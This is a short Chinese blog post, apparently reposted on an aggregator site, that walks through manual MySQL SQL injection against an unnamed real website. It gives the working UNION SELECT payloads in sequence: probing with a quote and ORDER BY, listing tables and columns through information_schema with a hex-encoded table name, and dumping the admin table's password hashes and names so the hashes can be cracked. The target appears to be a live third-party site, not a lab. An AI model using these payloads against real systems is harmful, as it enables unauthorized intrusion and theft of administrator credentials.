mysql手工注入

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mysql手工注入相关的知识,希望对你有一定的参考价值。

  今天想实际做一下mysql手工注入,于是找到了某某网站

  首先在URL后加一个‘ 报错,说明这个网站可能含有sql注入漏洞,可以进行下一步的测试

  目的就是看看能不能直接爆出用户名密码 先用order by看一下这个字段数量

 使用and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema = database()抱着试一试的心情看看能不能爆出数据库的表名

  这里主要是用到了mysql里边的那个元数据库

  执行这个语句后可以看到admin表,里密码不远了

  使用这个语句查看一下admin表里边都有什么这里最后table_name需要用HEX

  and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 0x61646D696E

  执行这个语句后发现admin表里边有和用户名密码有关的字段,接下来我们看一下admin表下和用户名密码有关的字段的内容

  使用语句:

  and 1=2 union select 1,group_concat(admin_password),3,4,5,6,7,8 from admin

  and 1=2 union select 1,group_concat(admin_firstname),3,4,5,6,7,8 from admin

  and 1=2 union select 1,group_concat(admin_lastname),3,4,5,6,7,8 from admin

这个网站的用户名是存放在两个字段里的,爆出之后需要拼接起来

重要的是密码是三个,两个md5($password,$salt),一个md5,接下来就是找网站解开这三个,这个网站的管理员用户名密码就通过手工注入的方式爆出来了。


以上是关于mysql手工注入的主要内容,如果未能解决你的问题,请参考以下文章

mysql+php手工注入-延时注入

Mysql手工注入

mysql手工注入

mysql手工注入

运维安全-MySQL手工注入

MySQL数据库5.X版本基本手工注入总结